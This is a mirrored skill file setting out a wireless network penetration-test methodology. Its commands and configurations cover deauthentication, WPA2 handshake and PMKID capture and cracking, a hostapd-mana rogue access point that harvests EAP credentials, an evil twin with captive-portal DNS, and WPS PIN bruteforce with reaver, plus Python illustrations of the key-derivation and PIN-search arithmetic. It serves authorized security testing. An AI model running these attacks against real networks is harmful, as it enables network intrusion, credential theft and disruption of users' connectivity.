mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-05 15:29:01 +03:00
---
name: performing-wireless-network-penetration-test
description: Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3 keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
domain: cybersecurity
subdomain: penetration-testing
tags:
- wireless-pentest
- WiFi
- Aircrack-ng
- WPA2
- WPA3
- rogue-AP
- evil-twin
- 802.11
- Kismet
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- ID.RA-01
- ID.RA-06
- GV.OV-02
- DE.AE-07
---

# Performing Wireless Network Penetration Test

## Overview

Wireless penetration testing evaluates the security of an organization's WiFi infrastructure, including encryption strength, authentication mechanisms, rogue access point detection, client isolation, and network segmentation. Testing covers 802.11a/b/g/n/ac/ax networks, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, captive portals, and Bluetooth/BLE where in scope. WPA3-SAE networks and clients enforcing Protected Management Frames (802.11w) resist the offline passphrase cracking and forged-deauthentication techniques below; against those, the assessment concentrates on configuration weaknesses (WPA2/WPA3 transition mode, WPS, open guest networks), client behaviour and segmentation rather than key recovery.

## When to Use

- When an authorized security assessment's scope includes the client's WiFi infrastructure
- When validating rogue AP detection and WIDS/WIPS response after a wireless-related security incident
- When performing scheduled security testing or auditing activities (annual or post-change wireless assessments)
- When validating wireless controls (802.1X, client isolation, guest segmentation) through hands-on testing

## Prerequisites

- Written authorization specifying wireless scope (SSIDs, BSSIDs, physical locations) and whether disruptive tests such as deauthentication are permitted
- Compatible wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036ACH, TP-Link TL-WN722N v1; later TL-WN722N revisions use a different chipset and need a third-party driver)
- Kali Linux with Aircrack-ng suite, Bettercap, Wifite, Kismet, hcxtools and hashcat
- Physical proximity to target wireless networks
- GPS receiver for mapping (optional)

## Phase 1 — Wireless Reconnaissance

### Enable Monitor Mode

```bash
# Check wireless interfaces, chipsets and drivers
iwconfig
airmon-ng

# Kill interfering processes (NetworkManager, wpa_supplicant).
# This drops the host's own WiFi connectivity; restore it afterwards with
# `systemctl start NetworkManager`.
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0
# Interface becomes wlan0mon

# Verify monitor mode
iwconfig wlan0mon

# Verify the adapter can inject frames (needed for deauth, PMKID and WPS
# attacks later); expect "Injection is working!"
aireplay-ng --test wlan0mon
```

### Passive Scanning

```bash
# Discover all networks in range (hops channels on the 2.4 GHz band by default);
# writes wireless_scan-01.csv and wireless_scan-01.cap
airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap

# Lock to a specific channel (stops hopping; use once a target is chosen)
airodump-ng wlan0mon -c 6 -w channel6_scan

# Scan the 5 GHz band (adapter must support 802.11a/ac)
airodump-ng wlan0mon --band a -w 5ghz_scan

# Scan all bands
airodump-ng wlan0mon --band abg -w full_scan

# Kismet passive scanning (advanced: device tracking, GPS logging, alerts)
kismet -c wlan0mon
# Access web UI at http://localhost:2501
```

### Network Inventory
|
|
|
|
| SSID | BSSID | Channel | Encryption | Clients | Signal |
|
|
|------|-------|---------|-----------|---------|--------|
|
|
| CorpWiFi | AA:BB:CC:DD:EE:01 | 6 | WPA2-Enterprise | 45 | -55dBm |
|
|
| CorpGuest | AA:BB:CC:DD:EE:02 | 11 | WPA2-PSK | 12 | -60dBm |
|
|
| PrinterNet | AA:BB:CC:DD:EE:03 | 1 | WEP | 3 | -70dBm |
|
|
| HiddenSSID | AA:BB:CC:DD:EE:04 | 36 | WPA2-PSK | 8 | -65dBm |
|
|
|
|
## Phase 2 — WPA2-PSK Attack

### Capture 4-Way Handshake

```bash
# Target specific network (locked to its channel; writes corpguest-01.cap)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon

# Deauthenticate a connected client (take its MAC from the STATION column;
# the one below is an example) to force a reconnection and capture the
# handshake. Omit -c to send broadcast deauth to every client; keep the
# count small to limit disruption.
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c 00:11:22:33:44:55 wlan0mon
# Forged deauth frames are ignored by clients using Protected Management
# Frames (802.11w); in that case wait for a natural reconnection.

# Verify handshake captured
aircrack-ng corpguest-01.cap
# Look for "1 handshake" in output
```

### Crack WPA2 Key
|
|
|
|
```bash
|
|
# Dictionary attack with Aircrack-ng
|
|
aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap
|
|
|
|
# GPU-accelerated cracking with Hashcat
|
|
# Convert cap to hccapx format
|
|
hcxpcapngtool -o hash.hc22000 corpguest-01.cap
|
|
|
|
# Hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)
|
|
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
|
|
-r /usr/share/hashcat/rules/best64.rule
|
|
|
|
# PMKID attack (no client needed)
|
|
hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng \
|
|
--filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2
|
|
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng
|
|
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
|
|
```
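The two cracking paths above (EAPOL MIC from a captured handshake, and PMKID from the AP's first EAPOL frame) both come down to one PBKDF2 per candidate passphrase followed by a cheap HMAC. The block below, an added example that is not aircrack-ng, hcxtools or hashcat code, carries that computation through in Python so the cost model is visible. Every input is constructed: the SSID and BSSID are taken from the inventory table above, the client MAC, nonces, EAPOL frame and wordlist are made up, and the target MIC and PMKID are derived from a passphrase chosen in the block rather than taken from a real capture.

```python
"""What hashcat -m 22000 / aircrack-ng compute per candidate passphrase.

Added example for this page; not aircrack-ng, hcxtools or hashcat code.
All inputs are constructed so the block runs offline.
"""
import hashlib
import hmac

# --- Constructed inputs (not from a real capture) ---
SSID = b"CorpGuest"
AP_MAC = bytes.fromhex("aabbccddee02")    # BSSID from the inventory table
STA_MAC = bytes.fromhex("001122334455")   # made-up client MAC
ANONCE = bytes(range(32))                 # AP nonce (EAPOL message 1)
SNONCE = bytes(range(32, 64))             # client nonce (EAPOL message 2)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step a dictionary attack pays per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA)[0:16]. The AP sends it
    in EAPOL message 1, which is why the PMKID attack needs no client."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512 built from HMAC-SHA1, used to expand PMK into PTK."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    The first 16 bytes of the PTK (the KCK) are all that the MIC check needs."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[0:16],
    computed over the EAPOL frame with its MIC field set to zero."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# EAPOL-Key message 2 with its 16-byte MIC field zeroed. The layout follows
# 802.1X/802.11 but the values are constructed for this example.
EAPOL_M2_ZEROED = (
    b"\x01\x03\x00\x75"   # 802.1X: version 1, type EAPOL-Key, body length 117
    + b"\x02"             # descriptor type: RSN
    + b"\x01\x0a"         # key info: version 2 (HMAC-SHA1), pairwise, MIC set
    + b"\x00\x00"         # key length
    + b"\x00" * 8         # replay counter
    + SNONCE              # key nonce
    + b"\x00" * 16        # key IV
    + b"\x00" * 8         # key RSC
    + b"\x00" * 8         # key ID
    + b"\x00" * 16        # MIC (zeroed for computation)
    + b"\x00\x16"         # key data length (22)
    + bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE
)

TRUE_PASSPHRASE = "Sunny-Day-2024"   # constructed "real" key for the demo
_true_pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
TARGET_PMKID = pmkid(_true_pmk, AP_MAC, STA_MAC)
TARGET_MIC = eapol_mic(kck_from_pmk(_true_pmk, AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_M2_ZEROED)

WORDLIST = ["password", "12345678", "corpguest", "Welcome1!", TRUE_PASSPHRASE, "letmein"]


def mic_matches(pmk: bytes) -> bool:
    """EAPOL path: derive the KCK from the candidate PMK and compare the MIC."""
    kck = kck_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return hmac.compare_digest(eapol_mic(kck, EAPOL_M2_ZEROED), TARGET_MIC)


def pmkid_matches(pmk: bytes) -> bool:
    """PMKID path: one HMAC per candidate, no handshake or client needed."""
    return hmac.compare_digest(pmkid(pmk, AP_MAC, STA_MAC), TARGET_PMKID)


def find_passphrase(wordlist, matches):
    """Dictionary attack: the PBKDF2 per candidate dominates the cost, which
    is why GPU cracking and good wordlists matter more than the final HMAC."""
    for candidate in wordlist:
        if matches(pmk_from_passphrase(candidate, SSID)):
            return candidate
    return None


if __name__ == "__main__":
    print("via EAPOL MIC:", find_passphrase(WORDLIST, mic_matches))
    print("via PMKID   :", find_passphrase(WORDLIST, pmkid_matches))
```

Both paths recover the same passphrase because both start from the same PBKDF2-derived PMK; the PMKID path simply skips the PTK expansion and needs no client traffic. None of this applies to WPA3-SAE, where the PMK comes from the Dragonfly exchange rather than from PBKDF2 over the passphrase, so a captured SAE handshake gives an attacker nothing to run a wordlist against.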
## Phase 3 — WPA2-Enterprise Attack

```bash
# Set up rogue AP with EAP credential harvesting using hostapd-mana.
# hostapd needs a managed (not monitor-mode) interface, so use a second
# adapter or stop airmon-ng on wlan0 first.
cat > hostapd-mana.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=CorpWiFi
hw_mode=g
channel=6
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
# Server certificate offered to clients (paths are placeholders). Clients
# that validate the RADIUS server certificate will refuse this AP; that
# refusal is itself a finding worth recording per client type.
ca_cert=certs/ca.pem
server_cert=certs/server.pem
private_key=certs/server.key
mana_wpe=1
mana_credout=creds.txt
EOF

# EAP user file: accept any identity and offer every inner method, so the
# client negotiates down to whatever it will accept
cat > hostapd.eap_user << 'EOF'
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2]
EOF

hostapd-mana hostapd-mana.conf

# Captured MSCHAPv2 challenge/response pairs (NetNTLMv1 format) can be
# cracked offline; TTLS-PAP submissions arrive in cleartext
hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
```

## Phase 4 — Evil Twin Attack

```bash
# Create evil twin with Bettercap
sudo bettercap -iface wlan0mon

# Within Bettercap:
wifi.recon on
set wifi.ap.ssid CorpGuest
set wifi.ap.bssid AA:BB:CC:DD:EE:02
set wifi.ap.channel 6
set wifi.ap.encryption false
wifi.ap

# Or manual evil twin with hostapd + dnsmasq: an open network with the
# target's SSID on a second adapter
cat > evil_twin.conf << 'EOF'
interface=wlan1
ssid=CorpGuest
hw_mode=g
channel=6
driver=nl80211
auth_algs=1
wpa=0
EOF

# Address the AP interface, start hostapd, then a DHCP/DNS server that
# resolves every name to the portal host (captive portal)
ip addr add 192.168.1.1/24 dev wlan1
hostapd evil_twin.conf &
dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h \
    --address=/#/192.168.1.1

# Deauth clients from the real AP to push them toward the evil twin.
# -0 0 is continuous: stop it as soon as the test is done. Clients with
# Protected Management Frames (802.11w) ignore forged deauth frames.
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
```

## Phase 5 — Additional Tests

### Rogue AP Detection

- Compare the authorized AP list (BSSIDs from client documentation or the WLAN controller) against every BSSID discovered in Phase 1
- Flag any unknown BSSID broadcasting a corporate SSID; a matching SSID with a different vendor OUI, an unexpected channel or an unusually strong signal is the classic evil-twin signature
- Check for misconfigured APs: personal hotspots or consumer routers bridging to the corporate network, IoT devices with default WiFi settings, and open or WEP networks from which corporate address space is reachable

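The Network Inventory table in Phase 1 and the rogue-AP comparison above are both produced from the same airodump-ng CSV, so one block serves both. It is an added example, not airodump-ng or Kismet code: it parses the AP and station sections that `airodump-ng -w ... --output-format csv` writes, builds the inventory rows (SSID, BSSID, channel, encryption, client count, signal), and flags BSSIDs that beacon a corporate SSID without being on the authorized list, weak encryption, and unassociated clients probing for corporate SSIDs. The CSV text, the BSSIDs and the authorized list are all constructed for the example.

```python
"""Inventory and rogue-AP checks over airodump-ng CSV output.

Added example for this page, not airodump-ng or Kismet code. SAMPLE_CSV
is constructed to mimic airodump-ng's CSV (AP section, then stations).
"""
import csv
import io
from collections import Counter

SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-05-01 10:00:01, 2024-05-01 10:10:00,  6,  54, WPA2, CCMP, MGT, -55,      210,        0,   0.  0.  0.  0,   8, CorpWiFi, 
AA:BB:CC:DD:EE:02, 2024-05-01 10:00:01, 2024-05-01 10:10:00, 11,  54, WPA2, CCMP, PSK, -60,      180,        0,   0.  0.  0.  0,   9, CorpGuest, 
AA:BB:CC:DD:EE:03, 2024-05-01 10:00:03, 2024-05-01 10:10:00,  1,  54, WEP , WEP , , -70,       90,      312,   0.  0.  0.  0,  10, PrinterNet, 
AA:BB:CC:DD:EE:04, 2024-05-01 10:00:05, 2024-05-01 10:10:00, 36,  54, WPA2, CCMP, PSK, -65,      150,        0,   0.  0.  0.  0,   0, , 
AA:BB:CC:DD:EE:99, 2024-05-01 10:02:11, 2024-05-01 10:10:00,  6,  54, WPA2, CCMP, PSK, -48,       70,        0,   0.  0.  0.  0,   8, CorpWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2024-05-01 10:00:02, 2024-05-01 10:10:00, -40,      120, AA:BB:CC:DD:EE:01, CorpWiFi
00:11:22:33:44:66, 2024-05-01 10:00:02, 2024-05-01 10:10:00, -42,       80, AA:BB:CC:DD:EE:02, 
00:11:22:33:44:77, 2024-05-01 10:01:00, 2024-05-01 10:10:00, -50,       30, AA:BB:CC:DD:EE:02, CorpGuest
00:11:22:33:44:88, 2024-05-01 10:01:30, 2024-05-01 10:10:00, -70,       10, (not associated), CorpWiFi,HomeNet
"""

# Constructed: what the client documents as its own APs, keyed by SSID.
AUTHORIZED = {
    "CorpWiFi": {"AA:BB:CC:DD:EE:01"},
    "CorpGuest": {"AA:BB:CC:DD:EE:02"},
}
WEAK_PRIVACY = {"OPN", "WEP"}
UNASSOCIATED = "(not associated)"


def parse_airodump_csv(text):
    """Return ({bssid: ap}, [station]) from airodump-ng CSV text."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not any(c.strip() for c in row):
            continue
        if row[0] == "BSSID":          # AP section header
            section = "ap"
            continue
        if row[0] == "Station MAC":    # station section header
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0]] = {"bssid": row[0], "channel": int(row[3]), "privacy": row[5].strip(),
                           "cipher": row[6].strip(), "auth": row[7].strip(),
                           "power": int(row[8]), "essid": row[13].strip()}
        elif section == "sta" and len(row) >= 6:
            stations.append({"mac": row[0], "power": int(row[3]), "bssid": row[5].strip(),
                             "probes": [p.strip() for p in row[6:] if p.strip()]})
    return aps, stations


def client_counts(stations):
    """Associated clients per BSSID; probing-only clients are excluded."""
    return Counter(s["bssid"] for s in stations if s["bssid"] != UNASSOCIATED)


def inventory_rows(aps, stations):
    """Rows in the shape of the Network Inventory table, strongest signal first."""
    counts = client_counts(stations)
    suffix = {"MGT": "-Enterprise", "PSK": "-PSK"}
    rows = []
    for ap in sorted(aps.values(), key=lambda a: a["power"], reverse=True):
        enc = ap["privacy"] + suffix.get(ap["auth"], "")
        rows.append((ap["essid"] or "<hidden>", ap["bssid"], ap["channel"], enc,
                     counts[ap["bssid"]], f"{ap['power']} dBm"))
    return rows


def rogue_aps(aps, authorized):
    """BSSIDs beaconing a corporate SSID that are not on the authorized list."""
    known = {b.upper() for bssids in authorized.values() for b in bssids}
    return [ap for ap in aps.values()
            if ap["essid"] in authorized and ap["bssid"].upper() not in known]


def weak_aps(aps):
    """Open, WEP or TKIP-only networks: findings regardless of who owns them."""
    return [ap for ap in aps.values() if ap["privacy"] in WEAK_PRIVACY or ap["cipher"] == "TKIP"]


def probing_for_corporate(stations, authorized):
    """Unassociated clients probing for corporate SSIDs: prime evil-twin targets."""
    return [s["mac"] for s in stations
            if s["bssid"] == UNASSOCIATED and set(s["probes"]) & set(authorized)]


APS, STATIONS = parse_airodump_csv(SAMPLE_CSV)

if __name__ == "__main__":
    for row in inventory_rows(APS, STATIONS):
        print("| " + " | ".join(str(c) for c in row) + " |")
    print("rogue:", [a["bssid"] for a in rogue_aps(APS, AUTHORIZED)])
    print("weak:", [a["bssid"] for a in weak_aps(APS)])
    print("probing:", probing_for_corporate(STATIONS, AUTHORIZED))
```

Run it against the real `wireless_scan-01.csv` by reading that file into `parse_airodump_csv` and replacing `AUTHORIZED` with the client's list; the BSSID comparison is case-insensitive because controllers and airodump-ng do not agree on MAC casing.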
### Client Isolation Testing
|
|
|
|
```bash
|
|
# After connecting to guest network:
|
|
# Scan for other clients
|
|
nmap -sn 192.168.10.0/24
|
|
|
|
# Attempt to reach corporate resources
|
|
nmap -sT -p 80,443,445,3389 10.0.0.0/24
|
|
|
|
# Test VLAN hopping
|
|
# If guest network is not properly segmented from corporate
|
|
```
|
|
|
|
### WPS Attack
|
|
|
|
```bash
|
|
# Check for WPS-enabled APs
|
|
wash -i wlan0mon
|
|
|
|
# WPS PIN bruteforce (if WPS enabled and not rate-limited)
|
|
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -vv
|
|
|
|
# Pixie-Dust attack (offline WPS PIN recovery)
|
|
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -K 1 -vv
|
|
```
|
|
|
|
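Why the online PIN bruteforce is feasible at all deserves a worked illustration. The block below is an added example, not reaver or wash code, and sends no frames: `wps_checksum` is the checksum arithmetic that fixes the eighth digit of a WPS PIN, and `SimulatedWpsAp` is a stand-in for the registrar exchange, in which the AP's reply to M4 reveals whether the first four digits are right and its reply to M6 whether the next three are. The PINs fed to it are constructed; a real AP may additionally lock WPS after a few failures, which the model deliberately omits.

```python
"""WPS PIN checksum and the split search that makes online bruteforce feasible.

Added example for this page, not reaver or wash code. SimulatedWpsAp models
the registrar protocol's two-half confirmation with no lockout.
"""


def wps_checksum(first_seven: int) -> int:
    """Checksum digit appended to the leading seven digits of a WPS PIN
    (the same arithmetic reaver uses to complete candidate PINs)."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedWpsAp:
    """Models an AP with no lockout: each half of the PIN is confirmed separately."""

    def __init__(self, pin: str):
        if not is_valid_wps_pin(pin):
            raise ValueError("constructed PIN must carry a valid checksum")
        self._pin = pin
        self.attempts = 0

    def try_first_half(self, half: str) -> bool:
        """Stands in for the M4 exchange: reveals whether digits 1-4 are right."""
        self.attempts += 1
        return half == self._pin[:4]

    def try_second_half(self, first: str, second: str) -> bool:
        """Stands in for the M6 exchange: reveals whether digits 5-8 are right."""
        self.attempts += 1
        return first + second == self._pin


def brute_force(ap: SimulatedWpsAp):
    """Recover the PIN with at most 10**4 first-half tries plus 10**3 second-half
    tries (the checksum fixes the 8th digit): 11,000 attempts worst case instead
    of 10**8 for a naive 8-digit search. Returns (pin, attempts)."""
    first = None
    for i in range(10_000):
        candidate = f"{i:04d}"
        if ap.try_first_half(candidate):
            first = candidate
            break
    if first is None:
        return None, ap.attempts
    for j in range(1_000):
        tail = f"{j:03d}"
        tail += str(wps_checksum(int(first + tail)))
        if ap.try_second_half(first, tail):
            return first + tail, ap.attempts
    return None, ap.attempts


if __name__ == "__main__":
    for secret in ("12345670", "99999995"):
        print(secret, "->", brute_force(SimulatedWpsAp(secret)))
```

The attempt count is what makes the rate-limit check in `wash` output decisive: at a few seconds per attempt, 11,000 attempts is hours of work against an AP that never locks, and effectively impossible against one that locks for minutes after a handful of failures.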
## Findings Template

| Finding | Severity | CVSS | Remediation |
|---------|----------|------|-------------|
| WPA2-PSK with weak passphrase | High | 8.1 | Use 20+ character passphrase or migrate to WPA2-Enterprise / WPA3 |
| WEP encryption on printer network | Critical | 9.1 | Upgrade to WPA2/WPA3, segment printer VLAN |
| WPS enabled on guest AP | Medium | 5.3 | Disable WPS on all access points |
| No client isolation on guest | High | 7.5 | Enable AP isolation and VLAN segmentation |
| Corporate SSID broadcast by rogue AP | High | 8.1 | Deploy WIDS/WIPS, implement 802.1X with server certificate validation |
| EAP-MSCHAPv2 without server certificate validation | High | 7.5 | Enforce RADIUS server certificate validation (and CA/name pinning) on all clients |

## References

- Aircrack-ng Documentation: https://www.aircrack-ng.org/doku.php
- CISA Aircrack-ng: https://www.cisa.gov/resources-tools/services/aircrack-ng
- Wi-Fi Alliance WPA3 Specification: https://www.wi-fi.org/discover-wi-fi/security
- NIST SP 800-153: Guidelines for Securing Wireless Local Area Networks (WLANs)
- Hashcat WPA modes: https://hashcat.net/wiki/doku.php?id=example_hashes